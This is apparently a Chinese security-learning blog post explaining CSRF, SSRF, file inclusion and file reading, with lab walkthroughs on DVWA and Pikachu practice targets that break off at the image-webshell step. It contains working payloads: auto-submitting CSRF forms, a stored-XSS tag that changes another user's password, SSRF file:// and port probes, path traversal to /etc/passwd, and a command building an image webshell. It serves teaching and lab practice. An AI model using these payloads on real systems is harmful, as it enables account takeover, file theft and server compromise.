<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="CSRF、SSRF、文件包含和文件读取"><meta name="keywords" content="Web"><meta name="author" content="wickt42"><meta name="copyright" content="wickt42"><title>CSRF、SSRF、文件包含和文件读取 | Wickt42's Tech Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '7.3.0'
} </script><meta name="generator" content="Hexo 7.3.0"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CSRF%EF%BC%88%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">CSRF（跨站请求伪造）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%88%90%E5%9B%A0"><span class="toc-number">1.1.</span> <span class="toc-text">成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%96%E6%8E%98"><span class="toc-number">1.2.</span> <span class="toc-text">挖掘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="toc-number">1.3.</span> <span class="toc-text">利用方式</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SSRF%EF%BC%88%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">SSRF（服务器端请求伪造）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%88%90%E5%9B%A0-1"><span class="toc-number">2.1.</span> <span class="toc-text">成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%96%E6%8E%98-1"><span class="toc-number">2.2.</span> <span class="toc-text">挖掘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">2.3.</span> <span class="toc-text">利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0"><span class="toc-number">2.4.</span> <span class="toc-text">相关函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E4%B8%AD"><span class="toc-number">2.4.1.</span> <span class="toc-text">php中</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%B1%E5%AE%B3"><span class="toc-number">2.5.</span> <span class="toc-text">危害</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">2.6.</span> <span class="toc-text">防御</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E4%B8%8ECSRF%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">3.</span> <span class="toc-text">XSS与CSRF的区别</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%88%E4%BE%8B%E5%A6%82%EF%BC%9A%E5%B0%86%E6%96%87%E4%BB%B6%E5%BD%93%E5%81%9Aphp%E6%96%87%E4%BB%B6%E6%89%A7%E8%A1%8C%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">文件包含（例如：将文件当做php文件执行）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0-1"><span class="toc-number">4.1.</span> <span class="toc-text">相关函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">4.2.</span> <span class="toc-text">本地文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%B1%E5%AE%B3-1"><span class="toc-number">4.2.1.</span> <span class="toc-text">危害</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">4.3.</span> <span class="toc-text">远程文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%B1%E5%AE%B3-2"><span class="toc-number">4.3.1.</span> <span class="toc-text">危害</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-number">5.</span> <span class="toc-text">文件读取</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0-2"><span class="toc-number">5.1.</span> <span class="toc-text">相关函数</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD"><span class="toc-number">6.</span> <span class="toc-text">任意文件下载</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#1%E3%80%81%E6%BC%94%E7%A4%BAcsrf%E6%BC%8F%E6%B4%9E%E9%85%8D%E5%90%88%E5%AD%98%E5%82%A8%E5%9E%8BXSS%E4%BF%AE%E6%94%B9%E5%85%B6%E4%BB%96%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81"><span class="toc-number">7.</span> <span class="toc-text">1、演示csrf漏洞配合存储型XSS修改其他用户密码</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2%E3%80%81%E4%BD%BF%E7%94%A8ssrf%E6%BC%8F%E6%B4%9E%E8%AF%BB%E5%8F%96%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="toc-number">8.</span> <span class="toc-text">2、使用ssrf漏洞读取操作系统敏感文件</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3%E3%80%81%E6%BC%94%E7%A4%BA%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E9%85%8D%E5%90%88%E5%9B%BE%E7%89%87%E6%9C%A8%E9%A9%AC%E7%9A%84%E4%BD%BF%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="toc-number">9.</span> <span class="toc-text">3、演示文件包含漏洞配合图片木马的使用过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A6%96%E5%85%88%E8%BF%9B%E8%A1%8C%E5%9B%BE%E7%89%87%E9%A9%AC%E7%9A%84%E5%88%B6%E4%BD%9C"><span class="toc-number">9.1.</span> <span class="toc-text">首先进行图片马的制作</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8Windows%E5%91%BD%E4%BB%A4%E8%A1%8C%EF%BC%88CMD%EF%BC%89"><span class="toc-number">9.1.1.</span> <span class="toc-text">使用Windows命令行（CMD）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8010editor%E5%B7%A5%E5%85%B7"><span class="toc-number">9.1.2.</span> <span class="toc-text">使用010editor工具</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%A8pikachu%E9%9D%B6%E5%9C%BA%E4%BD%BF%E7%94%A8%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">9.2.</span> <span class="toc-text">在pikachu靶场使用本地文件包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">9.3.</span> <span class="toc-text">使用远程文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A6%81%E6%B1%82"><span class="toc-number">9.3.1.</span> <span class="toc-text">要求</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4%E3%80%81%E6%BC%94%E7%A4%BA%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%92%8C%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">10.</span> <span class="toc-text">4、演示文件包含和文件读取的区别</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-1"><span class="toc-number">10.1.</span> <span class="toc-text">文件读取</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-number">10.1.1.</span> <span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%A5PHP%E8%AF%AD%E8%A8%80%E7%9A%84-fopen-%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BE%8B"><span class="toc-number">10.1.2.</span> <span class="toc-text">以PHP语言的 fopen() 函数为例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">10.2.</span> <span class="toc-text">文件包含</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250729165900674.jpg"></div><div class="author-info__name text-center">wickt42</div><div class="author-info__description text-center">Information Security</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/wickt42/wickt42.github.io">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">40</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">10</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">34</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://github.com/">github</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody">hexo-theme-melody</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250729164955479.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Wickt42's Tech Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/slides">Slides</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">CSRF、SSRF、文件包含和文件读取</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2025-08-27</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="CSRF（跨站请求伪造）"><a href="#CSRF（跨站请求伪造）" class="headerlink" title="CSRF（跨站请求伪造）"></a>CSRF（跨站请求伪造）</h1><p>通过伪装成受信任用户的请求，欺骗浏览器去执行攻击者预设的操作，如转账、修改邮箱地址、修改密码等。如果受害者拥有管理员权限，CSRF攻击甚至可能危及整个网站的安全。</p>
<h2 id="成因"><a href="#成因" class="headerlink" title="成因"></a>成因</h2><p> Web身份验证机制的固有弱点：浏览器会自动、无声地将用户的认证凭证（如Cookie、HTTP Basic Auth等）附加到每一个发往对应站点的请求中。</p>
<h2 id="挖掘"><a href="#挖掘" class="headerlink" title="挖掘"></a>挖掘</h2><p>用户资料修改（邮箱、密码）</p>
<p>资金转账（金融类应用）</p>
<p>内容发布&#x2F;删除（博客、社交媒体、后台系统）</p>
<p>购买商品（电商平台）</p>
<p>任何其他需要权限才能执行的操作</p>
<h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h2><p><strong>GET请求型CSRF</strong><br>这是最简单的一种，通常利用<code>&lt;img&gt;</code>, <code>&lt;iframe&gt;</code>, <code>&lt;script&gt;</code>, <code>&lt;link&gt;</code> 等标签的<code>src</code>属性，或者<code>&lt;a&gt;</code>链接，自动发起GET请求。</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 假设银行转账接口是GET请求 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;https://bank.com/transfer?to=attacker&amp;amount=10000&quot;</span> <span class="attr">width</span>=<span class="string">&quot;0&quot;</span> <span class="attr">height</span>=<span class="string">&quot;0&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<p>用户只要访问这个页面，浏览器就会尝试加载图片，从而无声地发送转账请求。</p>
<p><strong>POST请求型CSRF</strong><br>对于使用POST请求的操作，攻击者需要构造一个表单，并用JavaScript自动提交。</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;document.forms[0].submit()&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://bank.com/transfer&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;to&quot;</span> <span class="attr">value</span>=<span class="string">&quot;attacker&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;amount&quot;</span> <span class="attr">value</span>=<span class="string">&quot;10000&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Click for free money!&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></figure>



<h1 id="SSRF（服务器端请求伪造）"><a href="#SSRF（服务器端请求伪造）" class="headerlink" title="SSRF（服务器端请求伪造）"></a>SSRF（服务器端请求伪造）</h1><p>攻击者诱使服务器向其指定的内部或外部网络资源发起一个非本意的HTTP请求。</p>
<h2 id="成因-1"><a href="#成因-1" class="headerlink" title="成因"></a>成因</h2><p>应用提供了“让服务器代发请求”的功能，但未对用户传入的目标地址做严格限制，导致攻击者可以操纵服务器向任意地址（包括内部系统）发起请求。</p>
<h2 id="挖掘-1"><a href="#挖掘-1" class="headerlink" title="挖掘"></a>挖掘</h2><p><strong>远程图片加载&#x2F;下载</strong>：头像设置、文章插图、通过URL上传图片。</p>
<p><strong>网页抓取&#x2F;预览</strong>：SEO分析工具、网址安全检测、第三方分享预览。</p>
<p><strong>文件处理</strong>：Office在线预览（会下载链接的文件）、PDF生成器（会获取链接的内容渲染到PDF里）。</p>
<p><strong>API集成&#x2F;Webhook</strong>：在设置中填写一个Webhook回调地址，测试服务器是否会向该地址发送测试请求。</p>
<p><strong>从URL导入数据</strong>： RSS订阅、邮件客户端添加订阅、数据迁移工具。</p>
<p><strong>SSO&#x2F;OAuth认证</strong>：有时在认证流程中，服务器会向认证服务器发起请求。</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p><strong>常见协议</strong>：file:&#x2F;&#x2F; ， dict:&#x2F;&#x2F; ， gopher:&#x2F;&#x2F;</p>
<p><strong>进行端口探测</strong>：?url&#x3D;dict:&#x2F;&#x2F;127.0.0.1:1234</p>
<p>?url&#x3D;dict:&#x2F;&#x2F;127.0.0.1:3306</p>
<p><strong>读取本地文件</strong>：</p>
<p>?url&#x3D;file:&#x2F;&#x2F;C:\Windows\system32\drivers\etc\hosts</p>
<p><strong>内网web应用指纹识别</strong> ：识别内网应用使用的框架，平台，模块以及cms 可以为后续的渗透测试提供很多帮助。大多 数web 应用框架都有一些独特的文件和目录。通过这些文件可以识别出应用的类型，甚至详 细的版本。根据这些信息就可以针对性的搜集漏 进 攻击。比如可以通过访问下列 文件来 判断phpMyAdmin是否安装以及详细版本。 ?url&#x3D;<a target="_blank" rel="noopener" href="http://localhost/phpmyadmin/README">http://localhost/phpmyadmin/README</a> </p>
<p>配合redis实现写入webshell</p>
<h2 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h2><h3 id="php中"><a href="#php中" class="headerlink" title="php中"></a>php中</h3><p>file_get_contenes()</p>
<p>fsockopen()</p>
<p>curl_exec()</p>
<p>fopen()</p>
<h2 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h2><p>端口扫描</p>
<p>内网Web应用指纹识别</p>
<p>攻击内网Web应用</p>
<p>读取本地文件</p>
<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><p>白名单校验域名和协议；</p>
<p>禁用不必要的协议（如<code>file://</code>, <code>gopher://</code>）；</p>
<p>统一出口网络并严格过滤；</p>
<p>不要返回原始响应给客户端。</p>
<h1 id="XSS与CSRF的区别"><a href="#XSS与CSRF的区别" class="headerlink" title="XSS与CSRF的区别"></a>XSS与CSRF的区别</h1><p>XSS是跨站脚本攻击，主要核心成因是JavaScript代码能做的事XSS都能做，可以实现传播不当舆情、打开摄像头、截图等危险操作</p>
<p>CSRF是什么</p>
<p>多用于攻击受害者非本意的操作，修改密码、重启设备等操作</p>
<h1 id="文件包含（例如：将文件当做php文件执行）"><a href="#文件包含（例如：将文件当做php文件执行）" class="headerlink" title="文件包含（例如：将文件当做php文件执行）"></a>文件包含（例如：将文件当做php文件执行）</h1><p>文件包含漏洞是指应用程序在通过动态包含函数（如PHP中的 <code>include</code>, <code>require</code>, <code>include_once</code>, <code>require_once</code>）引入文件时，由于未对用户传入的文件名参数进行严格的校验，使得攻击者能够操控包含的文件路径，从而读取敏感文件或执行任意代码的安全漏洞。</p>
<h2 id="相关函数-1"><a href="#相关函数-1" class="headerlink" title="相关函数"></a>相关函数</h2><p>include() 多次包含 </p>
<p>include_once()  次包含 </p>
<p>require() 多次包含 </p>
<p>require_once()  次包含</p>
<h2 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h2><p>攻击者能够包含并读取服务器本地的任意文件。</p>
<h3 id="危害-1"><a href="#危害-1" class="headerlink" title="危害"></a>危害</h3><p><strong>敏感信息泄露：</strong> 读取系统敏感文件，如密码文件、应用程序源码、配置文件等。</p>
<p><strong>配合文件上传getshell：</strong> 如果网站存在文件上传功能，攻击者可以上传一个包含恶意代码的图片马，然后通过LFI去包含这个图片马，从而执行其中的代码。</p>
<p><strong>读取源码辅助审计：</strong> 读取PHP等源码文件，进行代码审计，寻找其他漏洞。</p>
<p><strong>利用伪协议：</strong> 配合PHP封装协议（如 <code>php://filter</code>）来读取源码，而不是直接执行。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">读取etc目录下的passwd文件</span><br><span class="line">http://example.com/index.php?page=../../../../etc/passwd</span><br><span class="line"></span><br><span class="line">读取windows的hosts文件</span><br><span class="line">http://example.com/index.php?page=../../../../Windows\system32\drivers\etc\hosts</span><br><span class="line"></span><br><span class="line">读取Web源码</span><br><span class="line">http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index</span><br><span class="line">（使用 php://filter 协议，对 index.php 文件（resource=index 会拼接成 index.php）进行 base64 编码后再输出。这样做的目的是为了避免文件被包含后直接执行，而是以base64编码的形式显示其源代码。攻击者解码后即可获得清晰的源代码。）</span><br></pre></td></tr></table></figure>

<p><strong>上传图片马</strong>：图片马内写有一句话木马</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">通过LFI包含图片马文件，攻击者可传入参数然后执行木马</span><br><span class="line">http://example.com/index.php?page=./uploads/shell.jpg</span><br></pre></td></tr></table></figure>



<h2 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h2><p>攻击者可以包含一个远程服务器上的文件（通常是恶意脚本）并执行。</p>
<p>但需要PHP配置满足以下条件：</p>
<p><code>allow_url_fopen = On</code> </p>
<p><code>allow_url_include = On</code> </p>
<h3 id="危害-2"><a href="#危害-2" class="headerlink" title="危害"></a>危害</h3><p><strong>直接执行任意代码：</strong> 攻击者可以直接在服务器上执行命令，完全控制服务器。</p>
<p><strong>webshell</strong>： 直接获取一个交互式的Webshell。</p>
<h1 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h1><p>目的是获取文件的内容数据，通常作为字符串或二进制流来处理。程序不会主动执行这些内容。</p>
<h2 id="相关函数-2"><a href="#相关函数-2" class="headerlink" title="相关函数"></a>相关函数</h2><p>fopen() </p>
<p>file_get_contents()</p>
<h1 id="任意文件下载"><a href="#任意文件下载" class="headerlink" title="任意文件下载"></a>任意文件下载</h1><p>存在读取文件的函数</p>
<p>读取文件的路径客户端可控</p>
<p>没有对文件类型进行校验或者校验不严</p>
<p>没有对文件路径进行校验或者校验不严</p>
<p>输出了文件的内容</p>
<h1 id="1、演示csrf漏洞配合存储型XSS修改其他用户密码"><a href="#1、演示csrf漏洞配合存储型XSS修改其他用户密码" class="headerlink" title="1、演示csrf漏洞配合存储型XSS修改其他用户密码"></a>1、演示csrf漏洞配合存储型XSS修改其他用户密码</h1><p>本次测试是在dvwa靶场的low等级</p>
<p>首先登录 dvwa 靶场的 admin 用户，然后修改密码为123456</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902200935610.png" alt="image-20250827160558465"></p>
<p>接着复制修改密码的url</p>
<figure class="highlight http"><table><tr><td class="code"><pre><span class="line">http://192.168.142.144/dvwa-master/vulnerabilities/csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#</span><br></pre></td></tr></table></figure>

<p>到存储型XSS界面添加一条留言，内容是</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;http://192.168.142.144/dvwa-master/vulnerabilities/csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#&quot;</span> <span class="attr">border</span>=<span class="string">&quot;8&quot;</span> <span class="attr">style</span>=<span class="string">&quot;display:none;&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<p>接下来切换用户 1337 原登录密码是 charley，使用 1337 用户访问存储型XSS的页面，这时候 1337 的用户密码已经被修改了</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902200940875.png" alt="image-20250827161625883"></p>
<p>重新登陆尝试，登录失败</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902200950406.png" alt="image-20250827161856271"></p>
<p>从数据库中查看用户名密码情况，发现admin用户和1337用户密码相同，说明1337用户密码被修改</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902200955100.png" alt="image-20250827162053586"></p>
<h1 id="2、使用ssrf漏洞读取操作系统敏感文件"><a href="#2、使用ssrf漏洞读取操作系统敏感文件" class="headerlink" title="2、使用ssrf漏洞读取操作系统敏感文件"></a>2、使用ssrf漏洞读取操作系统敏感文件</h1><p>首先观察pikachu靶场的SSRF_CURL页面，发现页面通过url访问了一个本地文件</p>
<figure class="highlight http"><table><tr><td class="code"><pre><span class="line">http://192.168.142.144/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902200959793.png" alt="image-20250827162439514"></p>
<p>删掉后续的路径，尝试访问一下mysql的3306端口</p>
<figure class="highlight http"><table><tr><td class="code"><pre><span class="line">http://192.168.142.144/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201004971.png" alt="image-20250827163210570"> </p>
<p>查看后端代码，发现使用curl_exec进行请求，但是这个函数还支持其他协议有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>] != <span class="literal">null</span>)&#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//接收前端URL没问题,但是要做好过滤,如果不做过滤,就会导致SSRF</span></span><br><span class="line">    <span class="variable">$URL</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">    <span class="variable">$CH</span> = <span class="title function_ invoke__">curl_init</span>(<span class="variable">$URL</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$CH</span>, CURLOPT_HEADER, <span class="literal">FALSE</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$CH</span>, CURLOPT_SSL_VERIFYPEER, <span class="literal">FALSE</span>);</span><br><span class="line">    <span class="variable">$RES</span> = <span class="title function_ invoke__">curl_exec</span>(<span class="variable">$CH</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_close</span>(<span class="variable">$CH</span>) ;</span><br><span class="line"><span class="comment">//ssrf的问是:前端传进来的url被后台使用curl_exec()进行了请求,然后将请求的结果又返回给了前端。</span></span><br><span class="line"><span class="comment">//除了http/https外,curl还支持一些其他的协议curl --version 可以查看其支持的协议,telnet</span></span><br><span class="line"><span class="comment">//curl支持很多协议，有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$RES</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>那么这里尝试使用file协议去读取服务器的 hosts 文件</p>
<figure class="highlight http"><table><tr><td class="code"><pre><span class="line">http://192.168.142.144/pikachu-master/vul/ssrf/ssrf_curl.php?url=file://C:\Windows\system32\drivers\etc\hosts</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201017134.png" alt="image-20250827163016607"></p>
<h1 id="3、演示文件包含漏洞配合图片木马的使用过程"><a href="#3、演示文件包含漏洞配合图片木马的使用过程" class="headerlink" title="3、演示文件包含漏洞配合图片木马的使用过程"></a>3、演示文件包含漏洞配合图片木马的使用过程</h1><h2 id="首先进行图片马的制作"><a href="#首先进行图片马的制作" class="headerlink" title="首先进行图片马的制作"></a>首先进行图片马的制作</h2><h3 id="使用Windows命令行（CMD）"><a href="#使用Windows命令行（CMD）" class="headerlink" title="使用Windows命令行（CMD）"></a>使用Windows命令行（CMD）</h3><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">copy picture.jpg/b+ma.php/a yjhmm.jpg</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">picture.jpg 是一个正常显示的图片文件，使用png格式可以</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">/b 表示以二进制模式读取文件</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">+ 表示将后面的文件内容追加到前一个文件内容后面</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">ma.php 一个写有木马的文件</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">/a 表示以文本模式读取文件</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">yjhmm.jpg 是将两个文件内容合并后输出的文件</span></span><br><span class="line"></span><br><span class="line">copy picture.jpg/b+1.php/a yjhmm.jpg</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201046632.png" alt="image-20250827164505377"></p>
